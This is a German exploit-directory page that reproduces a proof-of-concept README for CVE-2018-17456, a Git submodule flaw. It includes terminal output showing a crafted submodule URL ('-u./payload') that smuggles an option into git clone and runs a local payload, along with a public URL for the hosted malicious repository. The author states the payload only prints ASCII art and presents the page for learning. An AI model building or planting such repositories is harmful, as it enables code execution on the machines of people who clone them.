Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-17456 — Reproduktion der Schwachstelle CVE-2018-17456 (PoC+Exp) | Kitploit
Tools/GitHubGitHub/anonymking/cve-2018-17456
SchwachstellenanalyseCode-AnalyseExploitationLieferkettensicherheitLernen & BildungBinary-Exploitation
GitHubanonymking/cve-2018-17456

CVE-2018-17456

Reproduktion der Schwachstelle CVE-2018-17456 (PoC+Exp)

Repository anzeigen
53vor 7 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-17456

Schwachstellenübersicht

  • Schwachstellenname: Git-Eingabevalidierungsfehler-Schwachstelle
  • CNNVD-Nummer: CNNVD-201810-234
  • Gefahrenstufe: Kritisch
  • CVE-Nummer: CVE-2018-17456
  • Schwachstellentyp: Eingabevalidierungsfehler
  • Veröffentlichungsdatum: 2018-10-08
  • Bedrohungstyp: Remote
  • Aktualisierungsdatum: 2019-04-25
  • Hersteller: debian
  • Quelle der Schwachstelle: Atlassian, TerryZh...
  • Kurzbeschreibung: Git ist ein kostenloses, quelloffenes verteiltes Versionskontrollsystem. In Git existiert eine Schwachstelle aufgrund eines Eingabevalidierungsfehlers. Die Schwachstelle beruht darauf, dass das Netzwerksystem oder Produkt eingehende Daten nicht korrekt validiert. Die folgenden Versionen sind betroffen: Git vor 2.14.5, 2.15.x vor 2.15.3, 2.16.x vor 2.16.5, 2.17.x vor 2.17.2, 2.18.x vor 2.18.1, 2.19.x vor 2.19.1.

Schwachstellenreproduktion

  • Aufgrund der Sicherheitsmechanismen von GitHub können keine bösartigen Projekte hochgeladen werden. Daher können Sie das Skript build.sh ausführen, um dieses Projekt lokal für Lern- und Testzwecke zu erstellen.
  • Die von mir verwendete Git-Version ist git-2.12.1
  • Ablauf und Effekte wie folgt:
root@kitploit:~
[anonymking@localhost test]$ ./build.sh 
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/Submodule/.git/
[master (root-commit) 5b1e97c] submodule
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 hgt_blank
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/.git/
Cloning into '/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/exploit:exploit'...
done.
[master (root-commit) ed1914d] CVE-2018-17456
 3 files changed, 6 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 exploit:exploit
 create mode 100755 payload
git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" des_dir



[anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" test
Cloning into 'test'...
done.
Submodule 'exploit:exploit' (-u./payload) registered for path 'exploit:exploit'
Cloning into 'exploit'...


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '<  `.___\_<|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./payload' into submodule path '/home/anonymking/Desktop/test/test/exploit:exploit' failed
Failed to clone 'exploit:exploit' a second time, aborting
  • Der bösartige Code, den ich im Payload eingebaut habe, gibt lediglich einen Buddha aus. Daher bedeutet das Erscheinen des Buddha einen erfolgreichen Test. Tatsächlich wird dies zweimal ausgegeben, da bei fehlgeschlagenem Klonen des Submoduls ein erneuter Versuch unternommen wird.

Referenzen

  • Projekt poc-submodule

Unerwartete Entdeckung

  • Ich habe dieses Projekt tatsächlich erfolgreich auf Coding erstellt — CVE-2018-17456
  • Verwendung:
root@kitploit:~
git clone --recursive https://dev.tencent.com/u/anonymking/p/CVE-2018-17456/git test
  • Zusätzlich empfehle ich, zwei ähnliche Schwachstellen zusammen zu studieren: CVE-2017-1000117, CVE-2018-11235
Tool herunterladen